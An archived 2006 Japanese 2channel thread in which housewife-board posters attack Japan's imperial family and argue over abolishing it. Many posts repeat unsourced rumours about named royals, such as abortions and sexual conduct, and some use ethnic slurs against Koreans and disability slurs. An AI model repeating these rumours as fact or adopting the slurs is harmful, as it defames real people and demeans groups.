5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

  皇室・皇族が全員嫌い   

1 :可愛い奥様:2006/12/05(火) 18:33:03 ID:/pG8kc2U
なひとっているの?

2 :可愛い奥様:2006/12/05(火) 18:35:08 ID:g20vXCPn
たくさんいるんじゃない?

3 :可愛い奥様:2006/12/05(火) 18:37:13 ID:/pG8kc2U
今みたいな皇室ならね。


4 :可愛い奥様:2006/12/05(火) 18:51:03 ID:zNTRNQ2b
やっぱり 民間からお妃を・・・からおかしくなったような。
神秘性とか、高潔性がちょっと失われた感じは否めない。

5 :可愛い奥様:2006/12/05(火) 18:57:26 ID:0W5RpihH
明治天皇も大正天皇も昭和天皇も大嫌い!

無駄に土地を使って墓を立てるな!
明治神宮に初詣に行ってるやつってヴァカなんじゃないの?
あんな男に祈ったって何の御利益もねぇーつうんだよ!

6 :可愛い奥様:2006/12/05(火) 19:01:20 ID:/pG8kc2U
何時代か忘れたけど、皇族が性的に狂ってる時代があったらしいよ、マジで。



7 :可愛い奥様:2006/12/05(火) 19:05:40 ID:M0wGSw+8
皇室自体はあってもなくてもいいけど、今の皇室の中の人はみんな嫌い。


8 :可愛い奥様:2006/12/05(火) 19:11:00 ID:E8QMsp4E
【皇室】 紀子さま、ツリー点灯式に…出産後、初めて単独公務
http://news19.2ch.net/test/read.cgi/newsplus/1165217200/

日本や中国、かつてのヨーロッパにもあった生木には神が宿り気を感じるという
思想をなくさせるためにはじめたクリスマスツリーがありえない理由

神道 −木は神が宿る神聖なところ
     神や死んだ人を数えるとき○○柱というのは木とあの世が直結しているから
仏教 −山川草木悉有仏性といって全てに仏があるとする
     電飾するなど罰当たりに他ならない
     木にするなら犬猫人間でも電飾しなければならない
気功 −樹木は人にエネルギーを与える気を発する重要なもの
     余計なものは一切いらない
純真な心の少女−お花や植物とはお話ができるのでしません
平安時代の詩人−自然に対するもののあわれからしない
江戸の町人   −わびさびの美意識で、電飾のような無粋なことはしない
オーラ愛好家  −植物は純白のオーラを放ち、人の心を和ませてくれる大切なものなのでしない
ヒンズー教  −輪廻転生するのでやらない
ユダヤ教   −関心なし
イスラム教  −関心なし
ミトラ教    −クリスマスの原型、ツリーはない
ドルイド教  −生贄として吊るされた子供が飾りの起源といわれるが
          神が宿り神聖な気やオーラを放つ木にそのようなことをするはずがなく
          後世のでっち上げ話
キリスト教  −キリスト教とクリスマスツリーは何の関係もない

木材にしてからなら家、机を作る、魔法の杖を作る、押し花をするなど利用法いろいろ



9 :可愛い奥様:2006/12/05(火) 19:12:22 ID:E3kfSkk9
>>6
昔の皇室は近親相姦ばっかり。

10 :可愛い奥様:2006/12/05(火) 20:58:27 ID:/pG8kc2U
そうだな

11 :可愛い奥様:2006/12/05(火) 21:03:49 ID:tcKCnnxY
準皇族御夫妻はふくまれますか?

12 :可愛い奥様:2006/12/05(火) 21:05:13 ID:CcX6ev8l
私の住むスレはここなのかもしれない。

男尊女卑の皇室NO!


13 :可愛い奥様:2006/12/05(火) 21:07:17 ID:/pG8kc2U
美智子皇后は皇室破壊者第一人者だと思う。

14 :可愛い奥様:2006/12/05(火) 21:33:03 ID:4O3adSyL
雄略天皇の伝記読むとなんでこういう一族を
尊敬しなくてはいけないのか悩むよ

15 :可愛い奥様:2006/12/05(火) 22:11:44 ID:CcX6ev8l
戦争に負けたときに皇室あぼんしちゃえばよかったんだ

16 :可愛い奥様:2006/12/05(火) 22:45:19 ID:bfHLtiFp
禿同

17 :可愛い奥様:2006/12/05(火) 22:48:03 ID:/jb8RpgX
戦後、皇室は必要だった。しかし既に役割は終えた。もうなくしてただの一国民にしてもよかろう。

18 :可愛い奥様:2006/12/06(水) 00:31:56 ID:3X0/K35E
敗戦で天皇制を続けていくことが困難な状況だったのに、
下手なイメチェンしながらダラダラ続けているようなイメージ

19 :可愛い奥様:2006/12/06(水) 00:50:23 ID:+eoSf255
特に嫌いなのが高円宮。いつのまにか亡くなってたけど。
次に嫌いなのが両陛下と紀宮。

20 :可愛い奥様:2006/12/06(水) 01:28:21 ID:gwaKlRmV
というか、あの戦争で日本終わっててもよかったよ・・・

21 :可愛い奥様:2006/12/06(水) 01:41:46 ID:GiQQwrZO
赤ちゃんや小学生や中学生に「様」づけが気持ち悪くて嫌。

22 :可愛い奥様:2006/12/06(水) 07:28:06 ID:OmqueqLz
平成のゴタゴタが海外からどう面白おかしく見られてるかと思うと、
日本人としてとても恥ずかしい。
今後も皇室を続けるつもりなら、中の人たちも私情を捨てて淡々と
やっていってほしい。

23 :可愛い奥様:2006/12/06(水) 08:16:41 ID:pRK/dlFo
>>21
ID:GiQQwrZO 様
日本語を知らないあなたも嫌

24 :可愛い奥様:2006/12/06(水) 08:53:26 ID:PPi+TV1W
戦前の神格化された天皇像をいまだに引きずろうとしているのが痛い。
そりゃあシラケムードになるって国民は。

25 :可愛い奥様:2006/12/06(水) 17:11:13 ID:oQe9Fl71
皇族=ペット
庶民=家畜

26 :可愛い奥様:2006/12/06(水) 18:05:47 ID:A9d8CerI
>>21
うちの10歳の息子は時々1人でレストランへ行って待たされることがあって
順番が回ってきたときに様付けで呼ばれますが何か?

27 :可愛い奥様:2006/12/06(水) 18:34:10 ID:vhedTpzm
なんやかんやで我がままな人たちだよね。
いなくなってほしい。

28 :可愛い奥様:2006/12/06(水) 19:59:10 ID:GiQQwrZO
>>26
>うちの10歳の息子は時々1人でレストランへ行って

奥様、日本にお住まいでよかったですね。
アメリカなら警察に通報されてますわよ。
ママンの手料理がいくらまずいからって1人でレストラン
お友達もいない息子さんがカワイソウ。

29 :可愛い奥様:2006/12/06(水) 20:05:42 ID:90mJca0G
>>21
同意、なんで生まれたてホヤホヤのあかんぼに様などつけれるのか不思議。


30 :可愛い奥様:2006/12/06(水) 20:26:03 ID:pRK/dlFo
ID:90mJca0G 様
日本語を知らないあなたも嫌

31 :可愛い奥様:2006/12/06(水) 20:46:30 ID:90mJca0G
ID:pRK/dlFo

スレタイ嫁よヴォケ!おめえになんかすかれたくね〜よ!

先日皇室という本を見る機会あって眺めてたら新婚当時の今上夫婦が載ってたけど
まあ今上のアホ面、あきれたよ。今は少し良い顔になってきたけど。
200億もの税金こんな連中に毎年よく投資するものだよ。
もつと有意義につかってくれ〜

32 :可愛い奥様:2006/12/06(水) 20:58:09 ID:90mJca0G
ID:pRK/dlFo

松沢病院お迎え時車に乗って即刻おひきとりをw
一日中お仕事ご苦労なこったw安いバイト料で!

33 :可愛い奥様:2006/12/06(水) 20:59:08 ID:3X0/K35E
無菌状態で育てられ発育不全・生殖機能に障害がありそうな人ばかり。
神道のトップらしくピュアな池沼でありたいのなら、
昔みたいに御簾の奥深くに隠れていればよろしかろ

34 :可愛い奥様:2006/12/06(水) 21:09:48 ID:nClDQCAn
どうでもいい存在。
皇室ニュースなんか知ったこっちゃないし。
戦後に解体されるべきだった。

35 :可愛い奥様:2006/12/06(水) 21:17:13 ID:90mJca0G
ろくなのいないよね。もつとぱっとした人いないのかね〜
正田家の血入れてもまだあんな程度…どれだけ浄化しないとましにならないか。
ってかもうこんな人たち京都でも引っ込んで財団作ってID:pRK/dlFo みたいな
熱烈支持者だけでマンセーしていってほしいよ。

36 :可愛い奥様:2006/12/06(水) 21:37:35 ID:EocO52Kf
嫌いでも好きでもないけど、いない方がいい。
名字付けて普通の国民になればいいのに。
税金で食べてないで税金払ってる方が自由になれると思う。

37 :可愛い奥様:2006/12/06(水) 21:45:06 ID:90mJca0G
>>6
鯰とキコがそれで結婚したんでそ。学生なのに毎日しないと我慢できないんで
喪中だろうとなんだろうとかまわずさかり付いて犬みたいw

38 :可愛い奥様:2006/12/06(水) 21:52:27 ID:B4h5e8lb
>>37 日本語が不自由なんですか?

39 :可愛い奥様:2006/12/06(水) 22:26:26 ID:90mJca0G
>>38
いいえ日本語で喋ってますけど通じないおめえってww

40 :可愛い奥様:2006/12/06(水) 22:34:06 ID:GiQQwrZO
マニアの方には悪いけど
お金はかかってるけど微妙なセンスのお洋服を着たこの人たちを見ても
「ありがたい」という気持ちにはなれません。
1テープカット数十万が相場のお仕事して稼いでいらっしゃるんですから
服装のセンスだけでももう少しなんとかしていただけないでしょうか。

41 :可愛い奥様:2006/12/06(水) 22:41:01 ID:guBdA6Ek
個人的には嫌いな人たちじゃないけど、
華族とか皇族とか
すごい選民意識。
貴い人たちっていう、普通の人の上に立っているという考えかたが
差別を生んでると思う。



42 :可愛い奥様:2006/12/06(水) 22:48:16 ID:wc/cGzAj
あの髭の人は国民を見下してるのがありありと分かる。
保身に必死でみっともない。


43 :可愛い奥様:2006/12/07(木) 10:38:02 ID:69AjTSy7
苗字ね、源とか

44 :可愛い奥様:2006/12/07(木) 11:59:58 ID:XFby/eiM
>>41
>>42
そのわりには庶民だの普通だの、変に歪んだ家庭的アピールをするのが寒い。

45 :誘導:2006/12/07(木) 12:19:41 ID:LP3S66Ce
【 新・皇室御一行様 1 】
http://human5.2ch.net/test/read.cgi/ms/1162867558/l50
皇室御一行様★アンチ編★part732
http://human5.2ch.net/test/read.cgi/ms/1165456646/l50

46 :379訂正:2006/12/07(木) 14:13:18 ID:jgevx2Zk
>>39
お言葉が不自由なのね。

47 :可愛い奥様:2006/12/07(木) 18:39:51 ID:yHD0IP06
むかぁーしカルティエのパーティーを取材している番組を見てたら、顧客の久子様が500万のリングをお買い上げに…流石ですね!ってやっているのを見て殺意を感じた。

48 :可愛い奥様:2006/12/07(木) 18:45:33 ID:mgF48jtu
子供何回もおろしてるようなしたたかな女がゆくゆくは皇后とかになるんでしょ?
尊敬できない。
皇族見てるといらいらする。

49 :可愛い奥様:2006/12/07(木) 18:46:59 ID:bf6f1D6j
>>42
同意
目つきがありありと見下してるような感じ

50 :可愛い奥様:2006/12/07(木) 20:01:48 ID:RBSOwXnC
元紀宮の降嫁金一億円も許せない。

51 :可愛い奥様:2006/12/07(木) 20:14:24 ID:GVor4t6b
>>50
1億5000万な。
他に裏金がいっているし。

52 :可愛い奥様:2006/12/07(木) 20:15:49 ID:nxo+5GeN
オマケに理由作ってしょっちゅう実家帰りなんて、偽装結婚みたい。

53 :可愛い奥様:2006/12/07(木) 20:24:43 ID:nyUW3F/Z
>>42
時代錯誤の側室制度復活を唱えたり
女系になると「普通の家と同じになる」と見下したり
貴族的な美貌とは程遠い顔でこういう発言されてもね。

54 :可愛い奥様:2006/12/07(木) 20:33:31 ID:uR6p3DDa
正月の参賀の風景は、
ガラスケースの中で、
人形が動いているみたいで、キモい。
雅子だけいつもひきつった顔だったが、
雅子は、あの人形になりきれなかったのね。
親父にべったりの無能雅子も嫌いだが、
能面みたいな人形になりきっている奴らよりは、
まだ許せる。


55 :可愛い奥様:2006/12/07(木) 20:49:47 ID:RBSOwXnC
>>52
週2、3回は実家帰りでしょ。
バカじゃねーの。買い物もいまだ誰かについてもらってなんてプッ。。

56 :可愛い奥様:2006/12/07(木) 20:50:25 ID:pxZ6JeCs
>>46
おめえほど不自由してねえよ。
はやく松沢病院の車に乗って病院行ったほうがいいよ。ww

57 :可愛い奥様:2006/12/07(木) 20:52:14 ID:RBSOwXnC
↑皇族並みに無意味な奴乙!

58 :可愛い奥様:2006/12/07(木) 20:52:29 ID:UGvD3cNL
>>46
http://hissi.dyndns.ws/read.php/ms/20061207/amdldngyWms.html

59 :可愛い奥様:2006/12/07(木) 20:52:58 ID:ob8N7jMZ
貧乏人の僻みってすごいな…
やっぱり、知り合いはお金持ちだけに限ったほうがいいわ。
自分と関係ないことで相手をねたむパワーが不幸を呼ぶんだろうな。

60 :可愛い奥様:2006/12/07(木) 20:54:07 ID:pxZ6JeCs
>>55

買い物にだれかついていくだけじゃなくSPにも守られてるってよ。黒もでそ。
久子500万のリングかったってほんと、うん!殺意感じる。

堕胎女がやったらもっと感じる。

61 :可愛い奥様:2006/12/07(木) 20:57:12 ID:pxZ6JeCs
>>59
金持ちのおめえたちが皇族飼ってやれw

62 :可愛い奥様:2006/12/07(木) 22:38:06 ID:vAdvs3+z
久子さん程度の傍系宮で500万ものジュエリー買いできるのですね、
雅子さんだったらさぞかし贅沢し放題のことでしょう

63 :可愛い奥様:2006/12/07(木) 23:19:45 ID:/M71d/Mu
キコもブランド品買い捲りらしいね。

64 :可愛い奥様:2006/12/07(木) 23:35:49 ID:pxZ6JeCs
>>63
それを貧乏下図よに横流し。。。

65 :可愛い奥様:2006/12/07(木) 23:37:47 ID:/M71d/Mu
「国民」の税金で。サイテー

66 :可愛い奥様:2006/12/07(木) 23:43:08 ID:UJtx22ly
>>63
チーム大森乙。夜警ゴクロウサマ。
それはおめぇら出来損ないボス”雅子”のことだろ。
ブスでみっちみちに太った不細工女のくせに700万のブルガリのネックレスだ?
13万の靴だ?笑わせるな。

金喰い虫メ!



67 :可愛い奥様:2006/12/07(木) 23:49:28 ID:yHD0IP06
清子と学習院時代同期だった人に聞いたんだけど、清子とお付き(?)の友人が庭で口喧嘩して友人が「ブスのくせに!」って言ったら清子が「御祖父様に言い付けてやるー!」で次の日、友人の親は呼出し。友人は退学。父親は会社をクビになったらしい。怖い女だな。

68 :可愛い奥様:2006/12/07(木) 23:52:43 ID:G3wO6XRp
ハイハイクマクマっと。

69 :可愛い奥様:2006/12/07(木) 23:54:51 ID:pxZ6JeCs
清子にブスと言った子勇気あるね。以前ここで読んだのは誰かのおかずに「これ頂戴」
って箸のばしたら退学になったってのもあったよ。

皇族のいる学年なんか一緒になりたいかね〜

70 :可愛い奥様:2006/12/07(木) 23:57:14 ID:pxZ6JeCs
>>66
ここはキコきらい雅子憎しでなく全員消えて欲しいスレですので
自分のところへお戻りを。

71 :可愛い奥様:2006/12/08(金) 01:35:25 ID:iGOwHNWc
この人たちの公務って仕事なのかなあ。
特別待遇で顎足付きで国内海外旅行したり
庶民はチケット自腹で買ってるのに
運転手付きのお車で女官連れてコンサートや美術展鑑賞。
ずっと御所に引きこもってるのも退屈だから
公務と称して出歩いているだけじゃないの。

72 ::可愛い奥様::2006/12/08(金) 08:28:53 ID:dds0PE1U
>>71 叶姉妹がやってることとあんまり変わらないね。

73 :可愛い奥様:2006/12/08(金) 11:21:31 ID:ycrcoAJp
>>71
戦後、そういうスタイルで生きのびようとしたからね。
やれ、入園式だの弁当作りだの、
ママさんタレントかよ

74 :可愛い奥様:2006/12/08(金) 16:19:18 ID:ISTZHr/d
セクロスして子供産むのが一番の公務なんてパンダかときと一緒だね。
鯰やキコにぴったりの職業だ。

ほんとトロンとしたバカそうな顔した鯰、卑しいキコテレビに出てくるな!!!


75 :可愛い奥様:2006/12/08(金) 16:37:11 ID:oFCni6qR
>>74 だからオメーは巣に帰れってww

76 :可愛い奥様:2006/12/08(金) 16:41:29 ID:+U0hth0V
ここよく嫁!>>74
ttp://www.sky-load.net/up/img/124.jpg

77 :可愛い奥様:2006/12/08(金) 16:48:55 ID:ISTZHr/d
>>75>>76

うるせー!!皇族みたいなごく潰しは全員嫌いだがとくに鯰とキコは犬みたいに
発情場面国民に見せ付けたからとくにキモイんだよヴォケ!!!

78 :可愛い奥様:2006/12/08(金) 17:49:00 ID:+U0hth0V
更年期でつか?(゜p。)

79 :可愛い奥様:2006/12/08(金) 18:00:35 ID:6KjZiqXA
鯰といい、髭といい自分で金稼いだ感覚を味わいたいからって本まで出しちゃって、プププのプッ

80 :可愛い奥様:2006/12/08(金) 18:02:52 ID:x+3h30ze
皇族は自分で稼げよ!

81 :可愛い奥様:2006/12/08(金) 18:19:43 ID:A4wF8HeD
>80
チョンこそ自分で稼げ。

82 :可愛い奥様:2006/12/08(金) 18:20:54 ID:nmTSsuPg
朝鮮人の核はきれいな兵器、日本の通常兵器は汚い兵器です!
きれいな日本は朝鮮人が支配する日本です!

自衛隊海外派遣反対運動なのに「北朝鮮に核兵器を持つ権利を!」
http://210.136.109.177/cgi-bin/a-mori/img/3938.jpg


◆北朝鮮・拉致問題:経済制裁に反対、住民団体が街頭宣伝−−岡山
http://nyt.trycomp.com:8080/modules/news/article.php?storyid=3666

北朝鮮による日本人拉致問題の平和的解決を求めて、
「とめよう戦争への道!百万人署名運動・ 県連絡会」のメンバーらが17日夕、
岡山市駅前町の岡山会館前で街頭宣伝を行った。
メンバーらはマイクを手に、「経済制裁は拉致被害者の救出にはつながらない」
「一般市民をまきぞえにするな」などと訴えた。同会の野田隆三郎代表(67)は
「経済制裁で犠牲になるのは、権力者ではなく罪のない国民。
経済制裁を発動すれば、戦争につながりかねない」と話した。


「百万人署名運動」呼びかけ人
http://www2u.biglobe.ne.jp/~hyakuman/sandou.html

佐高信(評論家)
辛淑玉(人材育成コンサルタント)
知花昌一(沖縄・反戦地主)
辻元清美(衆議院議員)
中川ともこ(衆議院議員)
福島瑞穂(参議院議員)
保坂展人(衆議院議員)
本島等(前長崎市長)
桑江テル子(基地・軍隊を許さない行動する女たちの会事務局長)

83 :可愛い奥様:2006/12/08(金) 18:26:58 ID:Xa8CgmD8
皇室って政治的、経済的に使えるから絶対になくならないんでしょ?

84 :可愛い奥様:2006/12/08(金) 19:56:57 ID:6jw2hxhz
「お乳もよく飲みますね」
(2人見つめ合いながら)
「ムフフ」「ウフフン」

85 :可愛い奥様:2006/12/08(金) 20:29:10 ID:ycrcoAJp
>>83
そうです。
だから歴史上の権力者達は、高いエサ代を払って飼い続けてきたのです。

86 :可愛い奥様:2006/12/08(金) 20:42:28 ID:Ez566zQW
>>83 >>85

絶対なんてない。 ヨーロッパの王室がなくなったこともある。
国が滅ぶこともある。

最近では、韓国だって、IMF管理下におかれたこともある。

87 :可愛い奥様:2006/12/08(金) 21:19:54 ID:ISTZHr/d
熱海もあぶないそうだ。皇族一年間休みにしたらふたつの街くらい簡単に
救えるだろう。

いくら税金使ったら気が済むのだ。ごく潰しども!!!

88 :可愛い奥様:2006/12/09(土) 08:27:50 ID:MbvOOdzc
>>87 ごく潰しはお前だよ、頭からっぽの更年期ババア

89 :可愛い奥様:2006/12/09(土) 10:27:31 ID:SwHOMaRu
>>88
おめえほどひどくないよ。早く病院へもどった戻った!!!(おめえらのいつもの車
で)ね。w
皇族好きならマンセースレいくらでもあるからそっちへ行きゃがれ!!!ボケ!

90 ::可愛い奥様::2006/12/09(土) 14:09:28 ID:0qYPT+RN
>おめえらのいつもの車 でね。w

 面白すぎwwwwwwwwwwwwww



91 :可愛い奥様:2006/12/09(土) 22:44:47 ID:/4bHQaCv
なんで同じ人間なのに、様とかつけて尊敬しなきゃいけないのかわからない。
本当にいらない存在

92 :可愛い奥様:2006/12/09(土) 23:51:34 ID:09fRqMmI
200億もの金一年でよく使うよ。いくら職員の給料と言ってもね。
これだけあれば他に有効な使い道いっばいあるだろうに。
皇族は京都へ引っ込み財団設立し支持者で伝統守っていくべし。
一庶民には何の役にもたたんし祈ってもらいたくもない。
国が膨大な借金抱えてるのにいい気なもんだ。。。

93 :可愛い奥様:2006/12/10(日) 10:29:23 ID:P+tb2+q/
ほんとそう。
私たちの孫世代で天皇万歳なんていう人いるのかね。
へらへら笑っててをふる人たちにしかみえない。お気楽でいいよね

94 :可愛い奥様:2006/12/10(日) 11:02:21 ID:7/gQtt9w
バカか二重人格でなきゃやってらんね

95 :可愛い奥様:2006/12/10(日) 12:25:57 ID:HgegECw1
近親相姦、乱交、殺し合いをやってきたことがはっきりしている家系だからな。


96 :可愛い奥様:2006/12/10(日) 13:29:31 ID:XWH6uyYe
空き缶集めているお年寄りがいるのに湯水のごとく贅沢三昧の皇族、

昔岐阜白川へパイプオルガン聴きにきた紀宮の警備で警察官が出払い幼い少女
が川に落ち手薄で救えなかった事故があった。

こんな人種って。紀宮がなんぼのもんじゃ!!!ただのブス女じゃないか!!!

97 :可愛い奥様:2006/12/10(日) 14:30:12 ID:P+tb2+q/
震災が起きたときに、なーんにもしないで声だけかけてるだけだったじゃん。
なら、手伝えよ。

98 :可愛い奥様:2006/12/10(日) 21:35:54 ID:72ZXVsRu
つーか活動の邪魔してたじゃん。
天皇皇后が阪神大震災の被災地に来たとき、天皇皇后を迎える準備等がいかに邪魔だったか。

99 :可愛い奥様:2006/12/10(日) 21:57:43 ID:/gu/lHwR
ミティコも男の子二人授かってから3人目産むって信じられん。


100 :可愛い奥様:2006/12/10(日) 22:00:28 ID:aB1ujPLp
19 :可愛い奥様:2006/12/06(水) 00:50:23 ID:+eoSf255
特に嫌いなのが高円宮。いつのまにか亡くなってたけど。
次に嫌いなのが両陛下と紀宮。

皇太子夫妻の事は絶対言わないのが反皇室クオリティ

101 :可愛い奥様:2006/12/10(日) 23:38:49 ID:XWH6uyYe
そりや雅子は皇室なんぞ入らなければすばらしい人生が待っていただろうに
精神病になるほど追い詰められりゃ責める気せんわな〜

102 :可愛い奥様:2006/12/11(月) 00:20:55 ID:JP3DfyaR
文句言ってる人、さっさと日本からでてけば?
隣に皇室が無い国がありますよ

103 :可愛い奥様:2006/12/11(月) 00:21:23 ID:Zk5KVqUq
なにも考えずに入ったナイーブな雅子さまにぜひ皇室をぶっ壊していただきたい。
狂いついでに皇族全員○○していただきたい。

104 :可愛い奥様:2006/12/11(月) 02:00:17 ID:LrH+cvyO
>>102
スレタイ読んでからきやがれ。てめえに日本からでていけと言われる筋合いあんのか。
皇族マンセースレ行きおめえが皇族飼うんだな。ヴォケ!

105 :可愛い奥様:2006/12/11(月) 02:27:23 ID:dWMKfgZy
雅子さん、皇室なんて早く出たほうが幸せになれると思う。
それか、皇太子と共に改革者になってほしい

106 :可愛い奥様:2006/12/11(月) 02:40:09 ID:iiO7+zIr
週末に、映画『硫黄島からの手紙』を見てまいりました。
「天皇陛下万歳!」シーンが出て来るのですが、
私には、「日本国万歳! 日本国民万歳!」に聞こえました。
当時の人も、天皇を国体と考えていたようだから、
中には盲目な個人崇拝の感情を持つ人もいたかも知れないけれど、
普通には、「日本国万歳! 日本国民万歳!」の意だったのだと思う。

で、当時も、昭和天皇は陸軍から「ゴルフ三昧で遊んでばかりいて・・」などとバッシングされていたとか、
いつの時代も誰もが満足する天皇や皇族というのは無理だろうけど、
しかし、今、硫黄島のような危機があったとして、「天皇陛下万歳!」とは言わないわね、決して。
ストレートに、「日本国万歳! 日本国民万歳!」と叫んで死ぬと思う。
(軽い天ちゃんや皇族なんて、最期の場面で、思い出しもしないだろう。)


107 :可愛い奥様:2006/12/11(月) 02:47:07 ID:iiO7+zIr
相変わらず雅子様叩きが週刊誌などで続いているようですが、
これも不思議でなりません。
よく、雅子様を擁護すると、「草加の手先か!」と決め付けられてしまいますが、
本当に草加が組織を上げて動いているのだったら、
そもそも、こんなに雅子様叩きが続くはず、ないではありませんか。
それと、美智子様批判や、紀子様御親戚の耐震偽造建築家の記事は、速やかに揉み消されたと聞きます。
こんな皇室、溜息が出て、ウンザリなんですよね。


108 :可愛い奥様:2006/12/11(月) 02:49:44 ID:iiO7+zIr
107訂正。
  偽造 → 偽装。

109 :可愛い奥様:2006/12/11(月) 03:41:14 ID:FMTJMcK/
皆さん、「valueless value」という単語を覚えましょう。

110 :可愛い奥様:2006/12/11(月) 10:52:02 ID:edWEneKv
つまりあれだ、適応障害になったマサコのほうがまとも。
早く白塗りだの色ボケだのの傀儡どもを駆逐して欲しい。
嫌いだ嫌いだと言いつつ雅子スレばかり作るやつらって
変。

111 :可愛い奥様:2006/12/11(月) 11:11:27 ID:gFr6ZDy1
ここで皇室を叩いているのは成りすまし日本人のチョンだけだね。
普通の日本人はこんな感覚持たないもの。
そこまで日本が嫌いならどーぞ半島へ帰りなよ。
寄生しているくせによく言うよな。


112 :可愛い奥様:2006/12/11(月) 11:33:23 ID:4UmsE9fS
そうなのかな・?
私は皇太子さまと雅子さまの新潟の地震の時の
行動(体育館で被災者がまだ過ごしているのに
那須へ遊びに行った時&その時のコメント)で
今まで信じてたのに裏切られた気分。。
両陛下の事は相変わらず尊敬してるけど。

113 :可愛い奥様:2006/12/11(月) 12:02:10 ID:UsSKpygI
>>111 同意。読んでてまともなコメントないものね。
ただの個人的感情ぶつけてるだけ、自分がそう思ってるから周りもそうに違いない!
みたいなカンチガイっぷりとか。
天皇のどこがどう無駄なのか、廃止したらどういう世の中になるのか
国際関係はどうなるのか、
アンチを謳ってる人からそのあたりのビジョンが聞きたいね。
ただ嫌い嫌いと言ってるだけじゃ説得力皆無。かの国の人と同じじゃないか

114 :可愛い奥様:2006/12/11(月) 12:48:42 ID:WJrxspg8
廃止したらどういう世の中になるのですか?

115 :可愛い奥様:2006/12/11(月) 12:48:55 ID:UsSKpygI
>>91 世界一の旧家だからだ。おまえとは血統が違う。
おまえのものさしで測るな

116 :可愛い奥様:2006/12/11(月) 12:50:04 ID:UsSKpygI
>>92 国民ひとりあたりたった200円で維持できると思えば安い。

117 :可愛い奥様:2006/12/11(月) 12:51:36 ID:UsSKpygI
>>93 だからおまえがそうだからって皆まで同じと思うな。
孫世代にいたっても変わらぬ存在であることは間違いない

118 :可愛い奥様:2006/12/11(月) 12:53:49 ID:UsSKpygI
ここでバカみたいなこと言ってるやつはコレ読みなさい
バカでもわかりやすく書いてくれてるから

つttp://www.infosnow.ne.jp/~sevas/adult/japan/japan2.html

119 :可愛い奥様:2006/12/11(月) 13:40:23 ID:psEYmFnj
ここは皇族マンセーすれじゃないんで。
あ、日本語読めないかな?

120 :可愛い奥様:2006/12/11(月) 14:59:55 ID:edWEneKv
いやあ、素晴らしいコンビネーションw
アンチ皇室お得意の布教活動ってやつですね
わかりやすくいうと自作自演ってやつ
しばらく見学に回りますわ

121 :可愛い奥様:2006/12/11(月) 15:19:01 ID:D3sABfqg
>>115
日本一の旧家にしては池沼多いですね。2男なんかは今はどうか知らないが
色基地外に見えましたが。まあ繁殖が仕事てすからいいだろうけどね。

天皇家なくなったら日本どうなるんですか?な〜んも変わらんと思うけどね。
日本人はしたたかだよ。あんなアホづらさげた20数名の人間いなくなっても
ゴミが消える如しだよ。200憶毎年何の予算に回るか考えたほうがいい。。。

122 :可愛い奥様:2006/12/11(月) 15:28:14 ID:WJrxspg8
>>118
見たけど、やっぱいらないんじゃないかな。

123 :可愛い奥様:2006/12/11(月) 16:01:37 ID:mLlsy3k7
皇族を抹殺せよなんて思ってないわけ。
天然記念物として大事にしたいならそれでかまわないけど
国民の象徴だとか定義しないでさ
冷泉家みたいに市井に混じって勝手に男系男子の世襲してりゃいいでしょ。

124 :可愛い奥様:2006/12/11(月) 16:10:01 ID:yIhPq3VR
皇族の子供達に年間300万ちょっとのお金が支給されているのが嫌だ。ムカつく。

125 :可愛い奥様:2006/12/11(月) 16:32:19 ID:w8KhfIrg
これでこそ市井の声ってかんじよね。
アンチすれってなんか異常。


126 :可愛い奥様:2006/12/11(月) 16:51:57 ID:B9GQh9w5
>>123
賛成。そのほうが本人達も人間らしく自由に生きられそう。
冷泉家みたいなポジぐらいでちょうどいいんだよ。


127 :可愛い奥様:2006/12/11(月) 18:29:50 ID:iiO7+zIr
京都にお帰り頂いて、
宮内庁は、大リストラ。
皇居は国民に開放(地下鉄も通せる、災害時の避難場所として使える、観光客が金を落とすetc.、良い事づくめ。)
天皇陵の発掘・調査を進める。

で、又必要になったら、引っ張り出せばいいよ。
普段、お蔵に仕舞ってある家宝の壺や掛け軸みたいなもん、天皇家。

128 :可愛い奥様:2006/12/11(月) 20:10:01 ID:ELYt0Chq
国の借金が827兆円。国債発行して、例え消化出来ても金利払いに消えてしまう。
皇族を養っているような国家ではない。
天皇家は天皇教の信者を確保して、お賽銭で生活をしていきなさい。


129 :可愛い奥様:2006/12/11(月) 23:34:35 ID:C70W9UYo
天皇について

「King」は「kind(種類)」と語源は同じだと思われる。
つまり、血のつながり、血統を重視した王ということだ。
ヨーロッパの王族は万世万系で男系でも女系でも王位が与えられ「King」になることができる。
しかし、それは裏を返せば血縁者以外は決して「King」になれないということである。
では「Emperor」はどうか?
この言葉はおそらく「King」以外の王に使われる呼称だろう。
だからナポレオンは血統が悪く、どこの王族とも血がつながっていなかったため
「Emperor」になるしかなかったのではないだろうか?
この理屈からいくと、臣下の籍におりた者が皇族に戻ったケースが過去に何例もある天皇は
男系という血のつながりを重視する「King」にあてはまる。
では何故、天皇は「Emperor」なのか?
それは、現存する最古の血統であり万世一系である天皇に対し、世界は尊崇の念をもって、
唯一の存在「Emperor」と呼ぶのだろう。



130 :可愛い奥様:2006/12/12(火) 00:01:11 ID:W02O5Bqz
血統なんてみんなあって今日まで生きてきてるだけじゃん。要は家系ずがあるかないかの
違いだけだね。

131 :可愛い奥様:2006/12/12(火) 00:08:48 ID:tB0gpoz5
>>130 あんたみたくどこのノラ犬と交わってできたんだかわかんないよーな
家系じゃないのね。一緒に考えること自体おこがましい。
しかも天皇家のみならず、歴史や国が努力と犠牲を払って男系を守ってこられた家系。
それを簡単に失くしたり歴史を鑑みず今の考えに基づいてあっさり廃止することは
国家の大きな損失。まあ、「血」ていうスペックでしか考えられない人間には
わかんないだろーけどねw体液なんて万物流れてるわけだし。

132 :可愛い奥様:2006/12/12(火) 00:10:34 ID:tB0gpoz5
>>127 で、又必要になったら、引っ張り出せばいいよ。

市ね、という言葉しかもはや浮かばないわあんたみたいな低脳には


133 :可愛い奥様:2006/12/12(火) 00:13:04 ID:tB0gpoz5
>>128 そんな国がイヤなんだったらお隣の天皇のいない国にいけばいいんじゃね?
あんたみたいな人がひとりでも日本から消えていなくなったほうがどんだけ国のために有益か。


134 :可愛い奥様:2006/12/12(火) 00:21:20 ID:W02O5Bqz
ID:tB0gpoz5
大猛烈な皇族信者、人間は犬とは交われないけどあんたんちはそうなの?
何もこいつらに世話になったわけでもないし比べることもないしなんでおこがましいの?
そんなこと言われてくらべてくれるなよ。
あっちは税金で食わせてるのよ。国民が。バカじゃないの?

>>127の考え一番ベスト、
で猛信者のあんたたちで飼う。。


